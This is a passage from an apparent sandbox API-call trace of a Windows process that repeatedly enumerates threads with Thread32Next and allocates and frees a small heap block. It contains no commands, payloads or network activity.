returned 0x1134efb [0148.033] GetCurrentThreadId () returned 0x35c [0148.033] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.033] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.033] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.033] GetTickCount () returned 0x1134efb [0148.034] GetCurrentThreadId () returned 0x35c [0148.034] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.034] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.034] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.034] GetTickCount () returned 0x1134efb [0148.034] GetCurrentThreadId () returned 0x35c [0148.034] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.034] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.034] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.035] GetTickCount () returned 0x1134efb [0148.035] GetCurrentThreadId () returned 0x35c [0148.035] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.035] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.035] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.036] GetTickCount () returned 0x1134efb [0148.036] GetCurrentThreadId () returned 0x35c [0148.036] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.036] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.036] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.036] GetTickCount () returned 0x1134efb [0148.036] GetCurrentThreadId () returned 0x35c [0148.036] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.036] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.036] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.037] GetTickCount () returned 0x1134efb [0148.037] GetCurrentThreadId () returned 0x35c [0148.037] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.037] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.037] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.038] GetTickCount () returned 0x1134efb [0148.038] GetCurrentThreadId () returned 0x35c [0148.038] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.038] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.038] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.038] GetTickCount () returned 0x1134efb [0148.038] GetCurrentThreadId () returned 0x35c [0148.038] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.038] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.038] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.039] GetTickCount () returned 0x1134efb [0148.039] GetCurrentThreadId () returned 0x35c [0148.039] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.039] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.039] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.053] GetTickCount () returned 0x1134f0b [0148.053] GetCurrentThreadId () returned 0x35c [0148.053] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.053] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.053] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.054] GetTickCount () returned 0x1134f0b [0148.054] GetCurrentThreadId () returned 0x35c [0148.054] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.054] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.054] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.054] GetTickCount () returned 0x1134f0b [0148.054] GetCurrentThreadId () returned 0x35c [0148.055] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.055] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.055] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.055] GetTickCount () returned 0x1134f1a [0148.055] GetCurrentThreadId () returned 0x35c [0148.056] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.056] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.056] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.056] GetTickCount () returned 0x1134f1a [0148.056] GetCurrentThreadId () returned 0x35c [0148.056] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.056] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.056] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.057] GetTickCount () returned 0x1134f1a [0148.057] GetCurrentThreadId () returned 0x35c [0148.057] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.057] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.057] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.058] GetTickCount () returned 0x1134f1a [0148.058] GetCurrentThreadId () returned 0x35c [0148.058] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.058] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.058] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.059] GetTickCount () returned 0x1134f1a [0148.059] GetCurrentThreadId () returned 0x35c [0148.059] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.059] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.059] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.060] GetTickCount () returned 0x1134f1a [0148.060] GetCurrentThreadId () returned 0x35c [0148.060] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.060] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.060] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.061] GetTickCount () returned 0x1134f1a [0148.061] GetCurrentThreadId () returned 0x35c [0148.061] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.061] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.061] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.062] GetTickCount () returned 0x1134f1a [0148.062] GetCurrentThreadId () returned 0x35c [0148.062] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.062] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.062] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.063] GetTickCount () returned 0x1134f1a [0148.063] GetCurrentThreadId () returned 0x35c [0148.063] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.063] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.063] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.063] GetTickCount () returned 0x1134f1a [0148.063] GetCurrentThreadId () returned 0x35c [0148.064] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.064] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.064] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.064] GetTickCount () returned 0x1134f1a [0148.064] GetCurrentThreadId () returned 0x35c [0148.064] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.064] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.064] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.065] GetTickCount () returned 0x1134f1a [0148.065] GetCurrentThreadId () returned 0x35c [0148.065] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.065] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.065] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.066] GetTickCount () returned 0x1134f1a [0148.066] GetCurrentThreadId () returned 0x35c [0148.066] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.066] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.066] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.067] GetTickCount () returned 0x1134f1a [0148.067] GetCurrentThreadId () returned 0x35c [0148.067] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.067] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.067] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.068] GetTickCount () returned 0x1134f1a [0148.068] GetCurrentThreadId () returned 0x35c [0148.068] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.068] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.068] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.069] GetTickCount () returned 0x1134f1a [0148.069] GetCurrentThreadId () returned 0x35c [0148.069] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.069] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.069] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.070] GetTickCount () returned 0x1134f1a [0148.070] GetCurrentThreadId () returned 0x35c [0148.070] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.070] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.070] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.071] GetTickCount () returned 0x1134f1a [0148.071] GetCurrentThreadId () returned 0x35c [0148.071] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.071] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.071] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.072] GetTickCount () returned 0x1134f2a [0148.072] GetCurrentThreadId () returned 0x35c [0148.072] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.072] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.072] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.073] GetTickCount () returned 0x1134f2a [0148.073] GetCurrentThreadId () returned 0x35c [0148.073] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.073] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.073] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.073] GetTickCount () returned 0x1134f2a [0148.073] GetCurrentThreadId () returned 0x35c [0148.073] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.073] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.074] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.074] GetTickCount () returned 0x1134f2a [0148.074] GetCurrentThreadId () returned 0x35c [0148.074] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.074] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.074] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.075] GetTickCount () returned 0x1134f2a [0148.075] GetCurrentThreadId () returned 0x35c [0148.075] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.075] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.075] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.076] GetTickCount () returned 0x1134f2a [0148.076] GetCurrentThreadId () returned 0x35c [0148.076] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.076] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.076] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.077] GetTickCount () returned 0x1134f2a [0148.077] GetCurrentThreadId () returned 0x35c [0148.077] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.077] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.077] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.078] GetTickCount () returned 0x1134f2a [0148.078] GetCurrentThreadId () returned 0x35c [0148.078] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.078] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.078] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.079] GetTickCount () returned 0x1134f2a [0148.079] GetCurrentThreadId () returned 0x35c [0148.079] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.079] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.079] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.080] GetTickCount () returned 0x1134f2a [0148.080] GetCurrentThreadId () returned 0x35c [0148.080] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.080] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.080] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.081] GetTickCount () returned 0x1134f2a [0148.081] GetCurrentThreadId () returned 0x35c [0148.081] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.081] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.081] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.081] GetTickCount () returned 0x1134f2a [0148.081] GetCurrentThreadId () returned 0x35c [0148.081] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.081] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.082] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.082] GetTickCount () returned 0x1134f2a [0148.082] GetCurrentThreadId () returned 0x35c [0148.082] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.082] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.082] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.083] GetTickCount () returned 0x1134f2a [0148.083] GetCurrentThreadId () returned 0x35c [0148.083] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.083] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.083] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.084] GetTickCount () returned 0x1134f2a [0148.084] GetCurrentThreadId () returned 0x35c [0148.084] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.084] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.084] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.085] GetTickCount () returned 0x1134f2a [0148.085] GetCurrentThreadId () returned 0x35c [0148.085] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.085] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.085] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.086] GetTickCount () returned 0x1134f2a [0148.086] GetCurrentThreadId () returned 0x35c [0148.086] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.086] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.086] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.087] GetTickCount () returned 0x1134f39 [0148.088] GetCurrentThreadId () returned 0x35c [0148.088] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.088] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.088] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.088] GetTickCount () returned 0x1134f39 [0148.088] GetCurrentThreadId () returned 0x35c [0148.088] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.088] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.088] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.089] GetTickCount () returned 0x1134f39 [0148.089] GetCurrentThreadId () returned 0x35c [0148.089] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.089] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.089] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.090] GetTickCount () returned 0x1134f39 [0148.090] GetCurrentThreadId () returned 0x35c [0148.090] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.090] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.090] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.090] GetTickCount () returned 0x1134f39 [0148.090] GetCurrentThreadId () returned 0x35c [0148.090] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.090] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.090] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.091] GetTickCount () returned 0x1134f39 [0148.091] GetCurrentThreadId () returned 0x35c [0148.091] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.091] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.091] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.092] GetTickCount () returned 0x1134f39 [0148.092] GetCurrentThreadId () returned 0x35c [0148.092] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.092] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.092] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.092] GetTickCount () returned 0x1134f39 [0148.092] GetCurrentThreadId () returned 0x35c [0148.092] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.092] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.092] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.093] GetTickCount () returned 0x1134f39 [0148.093] GetCurrentThreadId () returned 0x35c [0148.093] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.093] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.093] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.094] GetTickCount () returned 0x1134f39 [0148.094] GetCurrentThreadId () returned 0x35c [0148.094] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.094] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.094] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.094] GetTickCount () returned 0x1134f39 [0148.094] GetCurrentThreadId () returned 0x35c [0148.094] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.094] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.095] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.095] GetTickCount () returned 0x1134f39 [0148.095] GetCurrentThreadId () returned 0x35c [0148.095] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.095] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.095] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.096] GetTickCount () returned 0x1134f39 [0148.096] GetCurrentThreadId () returned 0x35c [0148.096] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.096] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.096] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.097] GetTickCount () returned 0x1134f39 [0148.097] GetCurrentThreadId () returned 0x35c [0148.097] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.097] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.097] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.097] GetTickCount () returned 0x1134f39 [0148.097] GetCurrentThreadId () returned 0x35c [0148.097] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.097] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.097] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.098] GetTickCount () returned 0x1134f39 [0148.098] GetCurrentThreadId () returned 0x35c [0148.098] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.098] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.098] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.099] GetTickCount () returned 0x1134f39 [0148.099] GetCurrentThreadId () returned 0x35c [0148.099] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.099] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.099] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.099] GetTickCount () returned 0x1134f39 [0148.099] GetCurrentThreadId () returned 0x35c [0148.099] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.099] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.099] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.100] GetTickCount () returned 0x1134f39 [0148.100] GetCurrentThreadId () returned 0x35c [0148.100] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.100] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.100] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.101] GetTickCount () returned 0x1134f39 [0148.101] GetCurrentThreadId () returned 0x35c [0148.101] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.101] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.101] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.101] GetTickCount () returned 0x1134f39 [0148.101] GetCurrentThreadId () returned 0x35c [0148.101] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.101] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.101] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.102] GetTickCount () returned 0x1134f49 [0148.102] GetCurrentThreadId () returned 0x35c [0148.102] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.102] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.102] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.103] GetTickCount () returned 0x1134f49 [0148.103] GetCurrentThreadId () returned 0x35c [0148.103] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.103] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.103] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.103] GetTickCount () returned 0x1134f49 [0148.103] GetCurrentThreadId () returned 0x35c [0148.104] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.104] 